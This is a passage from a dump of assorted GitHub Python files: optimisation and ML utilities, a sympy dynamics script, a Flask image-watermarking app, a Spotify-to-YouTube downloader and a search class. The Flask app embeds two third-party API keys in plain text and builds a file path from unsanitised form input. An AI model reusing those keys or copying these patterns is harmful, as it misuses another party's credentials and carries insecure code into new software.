Model(\"item_{}\".format(i))\n x1 = mp.addVar(lb=0)\n x2 = mp.addVar(lb=0)\n mp.addConstr(x1 + 2 * x2 <= i, name=\"constr_1\")\n mp.addConstr(2 * x1 + x2 <= i, name=\"constr_2\")\n mp.setObjective(x1 + x2, sense=GRB.MAXIMIZE)\n mp.update()\n return mp\n\ndef solve_model(i):\n # mp = Model(\"item_{}\".format(i))\n # x1 = mp.addVar(lb=0)\n # x2 = mp.addVar(lb=0)\n # mp.addConstr(x1 + 2 * x2 <= i, name=\"constr_1\")\n # mp.addConstr(2 * x1 + x2 <= i, name=\"constr_2\")\n # mp.setObjective(x1 + x2, sense=GRB.MAXIMIZE)\n # mp.update()\n # mp.optimize()\n global model_list\n mp = model_list[i]\n mp.optimize()\n\n return mp.objVal\n\n# test the multiprocessing idea\nif __name__ == '__main__':\n global model_list\n set_start_method(\"fork\")\n model_list 
= []\n    for i in range(3):\n        mp = create_model(i + 1)\n        model_list.append(mp)\n\n    with Pool(3) as p:\n        model_results = p.map(solve_model, [0, 1, 2])\n\n    print(model_results)","repo_name":"haoxiangyang89/prod_distributed","sub_path":"src/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"722220245","text":"from __future__ import absolute_import\n\nimport re\nimport ctypes\nimport logging\nfrom math import sqrt\n\nfrom .ndarray import NDArray\nfrom .base import NDArrayHandle, py_str\nfrom . import ndarray\n\n\nclass Monitor(object):\n    \"\"\"Monitor outputs, weights, and gradients for debugging.\n\n    Parameters\n    ----------\n    interval : int\n        Number of batches between printing.\n    stat_func : function\n        A function that computes statistics of tensors.\n        Takes an `NDArray` and returns an `NDArray`. Defaults to\n        ||x||_2/sqrt(size(x)), a root-mean-square magnitude.\n    pattern : str\n        A regular expression specifying which tensors to monitor.\n        Only tensors with names that match `pattern` will be included.\n        For example, '.*weight|.*output' will print all weights and outputs and\n        '.*backward.*' will print all gradients.\n    \"\"\"\n    def __init__(self, interval, stat_func=None, pattern='.*', sort=False):\n        if stat_func is None:\n            def asum_stat(x):\n                \"\"\"returns ||x||_2/sqrt(size(x)), async execution.\"\"\"\n                return ndarray.norm(x)/sqrt(x.size)\n            stat_func = asum_stat\n        self.stat_func = stat_func\n        self.interval = interval\n        self.activated = False\n        self.queue = []\n        self.step = 0\n        self.exes = []\n        self.re_prog = re.compile(pattern)\n        self.sort = sort\n        def stat_helper(name, array):\n            \"\"\"wrapper for executor callback\"\"\"\n            array = ctypes.cast(array, NDArrayHandle)\n            array = NDArray(array, writable=False)\n            if not self.activated or not self.re_prog.match(py_str(name)):\n                return\n            self.queue.append((self.step, py_str(name), self.stat_func(array)))\n        self.stat_helper = stat_helper\n\n    def install(self, exe):\n        \"\"\"install callback to executor.\n        Supports installing to multiple exes.\n\n        Parameters\n        ----------\n        exe : mx.executor.Executor\n            The Executor (returned by symbol.bind) to install to.\n        \"\"\"\n        exe.set_monitor_callback(self.stat_helper)\n        self.exes.append(exe)\n\n    def tic(self):\n        \"\"\"Start collecting stats for current batch.\n        Call before calling forward.\"\"\"\n        if self.step % self.interval == 0:\n            for exe in self.exes:\n                for array in exe.arg_arrays:\n                    array.wait_to_read()\n                for array in exe.aux_arrays:\n                    array.wait_to_read()\n            self.queue = []\n            self.activated = True\n        self.step += 1\n\n\n    def toc(self):\n        \"\"\"End collecting for current batch and return results.\n        Call after computation of current batch.\n\n        Returns\n        -------\n        res : list of \"\"\"\n        if not self.activated:\n            return []\n        for exe in self.exes:\n            for array in exe.arg_arrays:\n                array.wait_to_read()\n            for array in exe.aux_arrays:\n                array.wait_to_read()\n        for exe in self.exes:\n            for name, array in zip(exe._symbol.list_arguments(), exe.arg_arrays):\n                if self.re_prog.match(name):\n                    self.queue.append((self.step, name, self.stat_func(array)))\n            for name, array in zip(exe._symbol.list_auxiliary_states(), exe.aux_arrays):\n                if self.re_prog.match(name):\n                    self.queue.append((self.step, name, self.stat_func(array)))\n        self.activated = False\n        res = []\n        if self.sort:\n            self.queue.sort(key=lambda x: x[1])\n        for n, k, v_list in self.queue:\n            if isinstance(v_list, NDArray):\n                v_list = [v_list]\n            assert 
isinstance(v_list, list)\n            s = ''\n            for v in v_list:\n                assert isinstance(v, NDArray)\n                if v.shape == (1,):\n                    s += str(v.asscalar()) + '\\t'\n                else:\n                    s += str(v.asnumpy()) + '\\t'\n            res.append((n, k, s))\n        self.queue = []\n        return res\n\n    def toc_print(self):\n        \"\"\"End collecting and print results.\"\"\"\n        res = self.toc()\n        for n, k, v in res:\n            logging.info('Batch: {:7d} {:30s} {:s}'.format(n, k, v))\n","repo_name":"hpi-xnor/BMXNet","sub_path":"python/mxnet/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"5695850017","text":"from collections import deque\nimport datetime\nfrom msa.core.event_handler import EventHandler\nfrom msa.core import get_supervisor\nfrom msa.builtins.signals import events\n\n\nclass StartupEventTrigger(EventHandler):\n    \"\"\"\n    Fires off a startup event and then exits\n    \"\"\"\n\n    def __init__(self, loop, event_bus, logger, config=None):\n        super().__init__(loop, event_bus, logger, config)\n\n    async def init(self):\n        # trigger startup hook later\n        self.loop.call_later(1, self.trigger_event)\n\n    def trigger_event(self):\n        new_event = events.StartupEvent()\n        new_event.init(\n            {\"timestamp\": datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M:%S:%f\")}\n        )\n        get_supervisor().fire_event(new_event)\n\n\nclass NetworkPropagateEventHandler(EventHandler):\n    def __init__(self, loop, event_bus, logger, config=None):\n        super().__init__(loop, event_bus, logger, config)\n\n        event_bus.subscribe(\".*\", self.handle)\n\n        self.buffered_events = deque(maxlen=10)\n\n    async def handle(self, event):\n\n        if isinstance(event, events.RequestDisburseEventsToNetworkEvent):\n            self.handle_disburse_request()\n            return\n\n        if not event._network_propagate:\n            return\n\n        self.buffered_events.append(event)\n\n    def handle_disburse_request(self):\n        new_event = events.DisburseEventsToNetworkEvent().init(\n            {\"events\": [event.get_metadata() for event in self.buffered_events]}\n        )\n        self.buffered_events.clear()\n        get_supervisor().fire_event(new_event)\n","repo_name":"MichaelGrabinski/moe-serifu-agent","sub_path":"python/msa/builtins/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"26428021648","text":"from sympy import symbols, diag\nfrom simbolics import simpLong, outputExprLong\n\nfrom fkcm.fk1cmS import fk1cmS\nfrom fkcm.fk2cmS import fk2cmS\nfrom fkcm.fk3cmS import fk3cmS\nfrom fkcm.fk4cmS import fk4cmS\nfrom fkcm.fk5cmS import fk5cmS\nfrom fkcm.fk6cmS import fk6cmS\nfrom fkcm.fk7cmS import fk7cmS\n\nfrom Jcm.J1cmS import J1cmS\nfrom Jcm.J2cmS import J2cmS\nfrom Jcm.J3cmS import J3cmS\nfrom Jcm.J4cmS import J4cmS\nfrom Jcm.J5cmS import J5cmS\nfrom Jcm.J6cmS import J6cmS\nfrom Jcm.J7cmS import J7cmS\n\ntt0, tt1, tt2, tt3, tt4, tt5, tt6, tt7 = symbols(\"tt0 tt1 tt2 tt3 tt4 tt5 tt6 tt7\")\n\ndef split(J):\n    # top three rows are the linear part, bottom three the angular part\n    return J[:3, :], J[3:, :]\n\nJ1cm = J1cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ2cm = J2cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ3cm = J3cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ4cm = J4cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ5cm = J5cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ6cm = J6cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ7cm = J7cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\n\n(J1cmv, J1cmw), (J2cmv, J2cmw), (J3cmv, J3cmw), (J4cmv, J4cmw), (J5cmv, J5cmw), (J6cmv, J6cmw), (J7cmv, J7cmw) = split(J1cm), split(J2cm), split(J3cm), 
split(J4cm), split(J5cm), split(J6cm), split(J7cm)\n\nfk1cm = fk1cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk2cm = fk2cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk3cm = fk3cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk4cm = fk4cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk5cm = fk5cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk6cm = fk6cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk7cm = fk7cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\n\nR1cm = fk1cm[:3,:3]\nR2cm = fk2cm[:3,:3]\nR3cm = fk3cm[:3,:3]\nR4cm = fk4cm[:3,:3]\nR5cm = fk5cm[:3,:3]\nR6cm = fk6cm[:3,:3]\nR7cm = fk7cm[:3,:3]\n\nI1cm = diag(0.033, 0.0333, 0.0123)\nI2cm = diag(0.0305, 0.0304, 0.011)\nI3cm = diag(0.025, 0.0238, 0.0076)\nI4cm = diag(0.017, 0.0164, 0.006)\nI5cm = diag(0.01, 0.0087, 0.00449)\nI6cm = diag(0.0049, 0.0047, 0.0036)\nI7cm = diag(0.001, 0.001, 0.001)\n\ndef simpMul(core_expr, le, re):\n    expr = core_expr\n\n    for i in range(len(le)):\n        print(\"left wing\")\n        print(\"member\", i)\n        expr = le[len(le)-1 - i] * expr\n        expr = simpLong(expr)\n\n    for i in range(len(re)):\n        print(\"right wing\")\n        print(\"member\", i)\n        expr = expr * re[i] \n        expr = simpLong(expr)\n    \n    return expr\n\n# each link pairs its own inertia matrix with its Jacobian and rotation\nfor Jcmw, Rcm, Icm, expr_name in zip([J1cmw, J2cmw, J3cmw, J4cmw, J5cmw, J6cmw, J7cmw], [R1cm, R2cm, R3cm, R4cm, R5cm, R6cm, R7cm], [I1cm, I2cm, I3cm, I4cm, I5cm, I6cm, I7cm], [\"M2\"+str(i+1) for i in range(7)]):\n    print(\"simplify\", expr_name)\n    fk = simpMul(Icm, [Jcmw.transpose(), Rcm], [Rcm.transpose(), Jcmw ])\n    outputExprLong(expr_name, fk)\n\n\n","repo_name":"gintautas12358/LBR_kinematics","sub_path":"forwardDynamicsMparts2.py","file_name":"forwardDynamicsMparts2.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1898177959","text":"import numpy as np\n\ndef make_train_mat(mininew, AS, D, SL):\n    # D = D / 2  # Uncomment this line if D needs to be halved as in the MATLAB script\n    miniTr = np.zeros((D, SL))\n    noiseTr = np.zeros((D, SL))\n\n    for n in range(D):\n        tmp = np.random.randint(0, len(AS) - SL)\n        miniTr[n, :] = AS[tmp:tmp + SL] + (mininew[n, :]) * 10\n\n    for n in range(D):\n        tmp2 = np.random.randint(0, len(AS) - SL)\n        noiseTr[n, :] = AS[tmp2:tmp2 + SL]\n\n    # Concatenate mini and noise sweeps into the training matrix\n    mnTr = np.concatenate((miniTr, noiseTr), axis=0)\n\n    # Target matrix\n\n    mnTa = np.concatenate((np.ones((D,1), dtype=int), np.zeros((D,1), dtype=int)), axis = 0)\n    mnTa = np.ravel(mnTa)\n\n    return mnTr, mnTa\n\n","repo_name":"mrreganwang/Mini_Scripts","sub_path":"python/helper_functions/MakeTrainMat.py","file_name":"MakeTrainMat.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41670373870","text":"\"\"\"Interpolation of 2-D data\"\"\"\n\nimport numpy as np\nfrom scipy.interpolate import interpn\n\ndef f(x, y):\n    return 2 * x**3 + 3 * y**2\n\n## original grid coordinates\nx = np.linspace(1, 4, 6)\ny = np.linspace(4, 7, 6)\n#print(type(x),len(x))\n\n## 2-D data\ndata = f(*np.meshgrid(x, y, indexing='ij', sparse=True))\n\n## grid coordinates to interpolate onto\nx2 = np.linspace(2, 3, 3)\ny2 = np.linspace(5, 6, 3)\nxy2 = np.array(np.meshgrid(x2,y2)).transpose((1,2,0))\n\nresult = interpn([x,y], data, xy2)\n\nfor j in range(3):\n    for i in range(3):\n        print(result[i,j],f(x2[i],y2[j]))\n","repo_name":"mokkei1978/mytool","sub_path":"python/scipy/interp2d.py","file_name":"interp2d.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33661792106","text":"import glob\nimport os\nfrom io import BytesIO\n\nimport boto3\nimport requests\nfrom PIL import Image\nfrom flask import Flask, render_template, request, flash\nfrom requests.api import get\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_DIR = os.path.join(ROOT_DIR, \"static\")\napp.config['UPLOAD_FOLDER'] = UPLOAD_DIR\n\n# create 'static' folder if not exists\nif not os.path.exists(UPLOAD_DIR):\n os.mkdir(UPLOAD_DIR)\n\n# configure boto3 client\ns3_client = boto3.client('s3')\n\n\n# utility functions\ndef get_s3_url(bucket_name, filename):\n return f\"https://{bucket_name}.s3.amazonaws.com/{filename}\"\n\n\ndef request_and_save(url, filename):\n req = requests.get(url)\n\n im = Image.open(BytesIO(req.content))\n path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n im.save(path, \"PNG\")\n\n return path\n\n# app endpoints\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n filename = None\n if request.method == 'POST':\n f = request.files['file']\n filename = secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('upload.html', filename=filename)\n\n\n@app.route('/watermark', methods=['POST'])\ndef apply_watermark():\n bucket_name = \"cgcscaleup3\" # INSERT YOUR BUCKET NAME\n\n filename = request.form['filename']\n path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n r1 = s3_client.upload_file(path, bucket_name, filename, ExtraArgs={'ACL': 'public-read'})\n\n #bucket_url = 'https://cgcscaleup3.s3.us-east-2.amazonaws.com/' + filename\n\n image_url = get_s3_url(bucket_name=bucket_name, filename=filename)\n\n # api key P23OWF071I39S6QUR2EL9MDT74B165JX48CKYZ8N0A5VHG\n # GENERATE REQUEST FOR QRACKAJACK\n qr_req_url = f'https://qrackajack.expeditedaddons.com/?api_key=P23OWF071I39S6QUR2EL9MDT74B165JX48CKYZ8N0A5VHG&content={image_url}'\n\n qr_name = f\"qr_{filename}\"\n qr_path = request_and_save(qr_req_url, qr_name)\n\n r2 = s3_client.upload_file(qr_path, bucket_name, qr_name, ExtraArgs={'ACL': 'public-read'})\n\n qr_url = get_s3_url(bucket_name, qr_name)\n\n\n # GENERATE REQUEST FOR WATERMARKER\n # warermarker api key \"5VYN48U9MFBOIR96Q1J40PWTHD23A5XG13C87Z2KES0L67\"\n watermark_req_url = f\"https://watermarker.expeditedaddons.com?api_key=5VYN48U9MFBOIR96Q1J40PWTHD23A5XG13C87Z2KES0L67&image_url={image_url}&watermark_url={qr_url}&opacity=50&position=center&width=100&height=100\"\n\n watermark_name = f\"watermark_{filename}\"\n request_and_save(watermark_req_url, watermark_name)\n\n print(\"watermark done\")\n\n # clean bucket\n s3_client.delete_object(Bucket=bucket_name, Key=qr_name)\n\n return render_template(\"upload.html\", filename=watermark_name)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"lilf4p/cgc-scaleup3","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10290092858","text":"from . 
import util, spotify, youtube\nimport youtube_dl\nimport os\nimport sys\nimport requests\nimport argparse\nimport logging\n\nlog = logging.getLogger('spytube')\nlogging.basicConfig(level=50)\t\t# CRITICAL 50, ERROR 40, WARNING 30, INFO 20, DEBUG 10, NOTSET 0\n\ntry:\n\tfrom mutagen.mp3 import MP3\n\tfrom mutagen.id3 import ID3, APIC, TIT2, TIT3, TPE1, TPE2, TALB, TPOS, TRCK, COMM\nexcept ImportError:\n log.critical(\"unable to import mutagen. install it to add id3 tags\") \n\nVERSION = \"0.1.5\"\nINVALID_CHARS = '<>:\"/\\|?*'\n\n\nclass Spytube(object):\n\tdef __init__(self, **kwargs):\n\t\tself.kwargs = kwargs\n\t\tself.folder_path = os.path.expanduser(kwargs[\"path\"] or util.CONFIG[\"DEFAULT\"][\"music_folder_path\"])\n\t\tif kwargs[\"token\"]:\n\t\t\tself.sp = spotify.Spotify(token = kwargs[\"token\"])\n\t\telse:\n\t\t\tself.sp = spotify.Spotify(util.CONFIG[\"DEFAULT\"][\"spotify_username\"],\n\t\t\t\t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_client_id\"],\n\t\t\t \t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_client_secret\"],\n\t\t\t \t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_redirect_uri\"])\n\t\tself.yt = youtube.Youtube(util.CONFIG[\"DEFAULT\"][\"youtube_api_key\"])\n\t\tself.sp_tracklist = None\n\n\tdef start(self):\n\t\tif self.sp:\n\t\t\tlog.debug(\"initialized spotipy\")\n\t\t\ttry:\n\t\t\t\tself.sp_tracklist = self.sp.get_tracklist(self.kwargs[\"link\"])\n\n\t\t\t\tif self.sp_tracklist:\n\t\t\t\t\tlog.info('got %s \"%s\" by \"%s\"' % \n\t\t\t\t\t\t(self.sp_tracklist.type, self.sp_tracklist.name, self.sp_tracklist.owner or self.sp_tracklist.artist))\n\t\t\t\t\tself.make_folder()\n\t\t\t\t\tself.download_songs()\n\t\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tlog.critical(e)\n\t\telse:\n\t\t\tlog.critical(\"could not initialize spotify\")\n\n\n\tdef make_folder(self):\n\t\t\"\"\"\n\t\tif -u or --add-username:\n\t\t\tadds \"by username\" to folder name (only for playlists)\n\t\tif -d or --add-date:\n\t\t\tfor playlist - adds last edit date (useful for Discover Weekly)\n\t\t\tfor album - adds publish date\n\t\tif -f or --add-folder:\n\t\t\tfor playlist - make separate folder if date (-d) exists\n\t\t\tfor albums - save album in artist folder (Artist/Album(date))\n\t\t\tfor one track - makes artist folder\n\n\t\tredo later?\n\t\t\"\"\"\n\t\tif self.kwargs[\"name\"] != None:\n\t\t\tself.folder_path += \"/\" + self.kwargs[\"name\"]\n\t\telse:\n\t\t\tjoinstr = [\"/\" , \"/\" if self.kwargs[\"add_folder\"] else \" - \", \" - \"]\n\t\t\tnames = []\n\t\t\tif (self.kwargs[\"add_folder\"] and self.sp_tracklist.type == \"track\") or self.sp_tracklist.type == \"album\":\n\t\t\t\tnames += [self.sp_tracklist.artist]\n\t\t\tif self.sp_tracklist.name:\n\t\t\t\tn = self.sp_tracklist.name\n\t\t\t\tif self.kwargs[\"add_username\"] and self.sp_tracklist.type == \"playlist\":\n\t\t\t\t\tn += \" by \" + self.sp_tracklist.owner\n\t\t\t\tnames += [n]\n\t\t\tif self.kwargs[\"add_date\"] and self.sp_tracklist.date:\n\t\t\t\tnames += [self.sp_tracklist.date[:10]]\n\t\t\tfor i,n in enumerate(names):\n\t\t\t\tself.folder_path += joinstr[i] + n\n\t\tif not os.path.isdir(self.folder_path):\n\t\t\tos.makedirs(self.folder_path)\n\t\t\tlog.info(\"created directory %s\" % self.folder_path)\n\t\tos.chdir(self.folder_path)\n\t\tlog.debug(\"changing working directory to %s\" % self.folder_path)\n\n\tdef ydl_hook(self, d):\n\t\tif d['status'] == 'finished':\n\t\t\tlog.info(\"converting to mp3\")\n\t\t# if d['status'] == 'downloading':\n\t\t# \tself.logger.info(\"downloading\")\n\t\t\n\tdef 
download_songs(self):\n\t\tfor i,song in enumerate(self.sp_tracklist.tracklist):\n\t\t\tlog.info(\"%i/%i %s - %s (%i sec)\" % \n\t\t\t\t(i+1,self.sp_tracklist.size, song.artist, song.title, song.duration))\n\t\t\t\n\t\t\tfilename = song.artist + \" - \" + song.title\n\t\t\tfor c in INVALID_CHARS:\n\t\t\t\tfilename = filename.replace(c,'_')\n\n\t\t\tif os.path.exists(filename + \".mp3\"):\n\t\t\t\tself.song_info(i+1, song)\n\t\t\t\tlog.info('song with that name already exists. skipping')\n\t\t\telse:\n\t\t\t\tlog.info(\"searching youtube\")\n\t\t\t\tr = self.get_song(song)\n\t\t\t\tif r:\n\t\t\t\t\tydl_opts = {\n\t\t\t\t\t 'format': 'bestaudio/best',\n\t\t\t\t\t 'outtmpl': filename + '.%(ext)s',\n\t\t\t\t\t 'postprocessors': [{\n\t\t\t\t\t 'key': 'FFmpegExtractAudio',\n\t\t\t\t\t 'preferredcodec': 'mp3',\n\t\t\t\t\t 'preferredquality': '192',\n\t\t\t\t\t \t},],\n\t\t\t\t\t 'logger': log,\n\t\t\t\t\t\t'ignoreerrors': True,\n\t\t\t\t\t 'progress_hooks': [self.ydl_hook],\n\t\t\t\t\t}\n\n\t\t\t\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\t\t\t\tlog.info(\"downloading %s (%s)\" % (r.title, r.URL))\n\t\t\t\t\t\tydl.download([r.URL])\n\n\t\t\t\t\tif MP3:\n\t\t\t\t\t\tself.add_metadata(filename, song)\n\t\t\t\t\tself.song_info(i+1, song, True)\n\t\t\t\t\tlog.info('successfully downloaded song')\n\t\t\t\telse:\n\t\t\t\t\tself.song_info(i+1, song, False)\n\t\t\t\t\tlog.warning('error while downloading song')\n\n\tdef get_song(self,song):\n\t\tresults = self.yt.search(song.artist + \" - \" + song.title, \n\t\t\tmaxres=min(self.kwargs[\"results\"] or 10,50) if self.kwargs[\"search_type\"] else 1)\n\t\t#set maxres if specified, 10 is default, 50 is max. if search type is 0 (first result), maxres = 1\n\t\tif not results:\n\t\t\tlog.debug(\"no youtube results\")\n\t\t\treturn None\n\t\tif self.kwargs[\"search_type\"] == 1:\n\t\t\tlog.debug(\"searching for song with equal duration\")\n\t\t\tfor res in results:\n\t\t\t\tif res.duration == song.duration:\n\t\t\t\t\treturn res\n\t\telif self.kwargs[\"search_type\"] == 2:\n\t\t\tsong.info()\n\t\t\tfor i,res in enumerate(results):\n\t\t\t\tprint(i+1)\n\t\t\t\tres.info()\n\t\t\tdec = 51\n\t\t\twhile dec > len(results) or dec < 1:\n\t\t\t\tdec = int(input(\"Enter choice: \"))\n\t\t\treturn results[dec-1]\n\t\tlog.debug(\"getting first result\")\n\t\treturn results[0]\n\n\n\tdef add_metadata(self, filename, song):\n\t\t\"\"\"\n\t\thttp://id3.org/id3v2.4.0-frames\n\t\t\"\"\"\n\t\tlog.info('adding metadata')\n\t\tlog.info(self.folder_path)\n\t\tif os.path.isfile(self.folder_path + \"/\" + filename + \".mp3\"):\n\t\t\tmp3file = MP3(filename + \".mp3\", ID3=ID3)\n\n\t\t\tif self.kwargs[\"metadata\"]:\n\t\t\t\topts = [int(o) for o in bin(self.kwargs[\"metadata\"])[2:]]\n\t\t\telse:\n\t\t\t\topts = [1,1,1] if self.sp_tracklist.type == \"album\" else [1,1,0]\n\n\t\t\tif opts[0]: #default\n\t\t\t\tmp3file['TIT2'] = TIT2(encoding=3, text=song.title)\n\t\t\t\tmp3file['TPE1'] = TPE1(encoding=3, text=song.artist)\n\n\t\t\tif opts[1]:\t#default\n\t\t\t\tmp3file['TALB'] = TALB(encoding=3, text=song.album)\n\t\t\t\tcover = requests.get(song.cover[1]).content\n\t\t\t\tif cover:\n\t\t\t\t\tmp3file['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=cover)\n\t\t\t\telse:\n\t\t\t\t\tlog.warning(\"Error while getting cover\")\n\n\t\t\tif opts[2]:\t#default for album download\n\t\t\t\tmp3file['TPE2'] = TPE2(encoding=3, text=song.album_artist)\n\t\t\t\tmp3file['TPOS'] = TPOS(encoding=3, text=str(song.disc_num))\n\t\t\t\tmp3file['TRCK'] = TRCK(encoding=3, 
text=str(song.track_num))\n\t\t\t\t#mp3file['TIT3'] = TIT3(encoding=3, text=\"Subtitle\")\n\t\t\t\t#mp3file['COMM'] = COMM(encoding=3, text=\"Comment\")\t\t#add comment with youtube and spotify url?\n\n\t\t\tmp3file.save()\n\t\telse:\n\t\t\tlog.info(\"skipped song\")\n\n\tdef song_info(self, i, song, status = None):\n\t\tif not self.kwargs[\"verbose\"]:\n\t\t\tif status:\n\t\t\t\tstat = \"\\033[92mSuccess\\033[0m\" \n\t\t\telif status == False: \n\t\t\t\tstat = \"\\033[91m Error \\033[0m\"\n\t\t\telse:\n\t\t\t\tstat = \"\\033[93mSkipped\\033[0m\"\n\t\t\tprint(\"[%s][%d/%d] %s\" % (stat, i, self.sp_tracklist.size, song))\n\ndef parse_args(args):\n\tparser = argparse.ArgumentParser(description='Download spotify playlist/album/song from youtube')\n\tparser.add_argument('link', type=str,\n\t\thelp='Spotify link (url or uri)')\n\tparser.add_argument('-s','--search-type', type=int, choices=[0,1,2],\n\t\thelp='Define the search type: 0 - download first youtube result, 1 - download song with equal duration (default), 2 - prompt the user for every download')\n\tparser.add_argument('-r','--results', type=int,\n\t\thelp='Number of results for every youtube search. (max = 50)')\n\tparser.add_argument('-t','--token',\n\t\thelp=\"Spotify auth token. Use this if you don't have spotify app setup or you want to bypass using default user credentials\")\n\tparser.add_argument('-m','--metadata', type=int,\n\t\thelp='Add metadata tags. Input is decimal number from 0 to 7 representing binary options (title&artist | album&cover | other)')\n\tparser.add_argument('-n','--name', nargs='?', const=\"\",\n\t\thelp='Replaces folder name with the user specified one. Using only -n saves songs to default music folder or the one specified with -p. This overrides -d -u and -f arguments.')\n\tparser.add_argument('-p','--path',\n \thelp=\"Path to the folder where you want the files downloaded\")\n\tparser.add_argument('-d','--add-date',action=\"store_true\",\n\t\thelp=\"Add a date to folder name. Adds last added song date to playlists or publish date for albums (useful for downloading Discover Weekly playlists)\")\n\tparser.add_argument('-u','--add-username',action=\"store_true\",\n\t\thelp=\"Add owner name to destination folder (works only for playlists)\")\n\tparser.add_argument('-f','--add-folder',action=\"store_true\",\n\t\thelp=\"Makes subfolder if possible. Name of the folder is always the first value. 
(For example artist/album, playlist/date, etc...)\")\n\tparser.add_argument('-v', '--verbose', action=\"count\",\n\t\thelp=\"Print additional info or debugging information\")\n\n\targs = parser.parse_args(args)\n\treturn args\n\ndef main(args=None):\n\tif args is None:\n\t\tif len(sys.argv) <= 1:\n\t\t\tlog.critical('you need to provide spotify link')\n\t\t\tsys.exit()\n\t\telse:\t\n\t\t\targs = parse_args(sys.argv[1:])\n\tif args.verbose:\n\t\tlog.setLevel(int(20/args.verbose))\n\tlog.debug(args)\n\tutil.init()\n\tspyt = Spytube(**vars(args))\n\tspyt.start()\t\t\n\nif __name__ == \"__main__\":\n    main()","repo_name":"josduj/spytube","sub_path":"spytube/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42732480084","text":"from flask import current_app\nfrom invenio_indexer.api import RecordIndexer\nfrom invenio_search.utils import build_alias_name\nfrom oarepo_communities.search import CommunitySearch\n\n\nclass DatasetRecordsSearch(CommunitySearch):\n    LIST_SOURCE_FIELDS = [\n        'InvenioID', 'oarepo:validity.valid', 'oarepo:draft',\n        'titles', 'abstract', 'creators', 'dateCreated', 'dateAvailable', 'resourceType', 'accessRights', 'rights',\n        'contributors', 'keywords', 'subjectCategories', 'relatedItems', 'oarepo:recordStatus', 'language',\n        'oarepo:primaryCommunity', 'oarepo:secondaryCommunities', '$schema', '_files'\n    ]\n    HIGHLIGHT_FIELDS = {\n        'titles.title.cs': None,\n        'titles.title._': None,\n        'titles.title.en': None\n    }\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        # https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations.html#return-agg-type\n        typed_keys = current_app.config.get(\"NR_ES_TYPED_KEYS\", False)\n        self._params = {'typed_keys': typed_keys}\n\n\nclass CommitingRecordIndexer(RecordIndexer):\n    def index(self, record, arguments=None, **kwargs):\n        ret = super().index(record, arguments=arguments, **kwargs)\n        index, doc_type = self.record_to_index(record)\n        index = build_alias_name(index)\n        self.client.indices.refresh(index=index)\n        return ret\n","repo_name":"Narodni-repozitar/nr-datasets","sub_path":"nr_datasets/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35672661160","text":"class Solution(object):\n    def __init__(self):\n        self.left = -1\n        self.right = -1\n    def searchRange(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n\n        N = len(nums)\n\n        def search(start,end):\n            if start > end:\n                return\n\n            mid = (start + end) // 2\n\n            if nums[mid] < target:\n                search(mid + 1,end)\n            elif nums[mid] > target:\n                search(start, mid - 1)\n            else:\n                self.right = max(self.right , mid)\n                if self.left >= 0:\n                    self.left = min(self.left , mid)\n                else:\n                    self.left = mid\n                search(mid + 1,end)\n                search(start, mid - 1)\n        \n        search(0,N - 1)\n        \n        return [self.left, 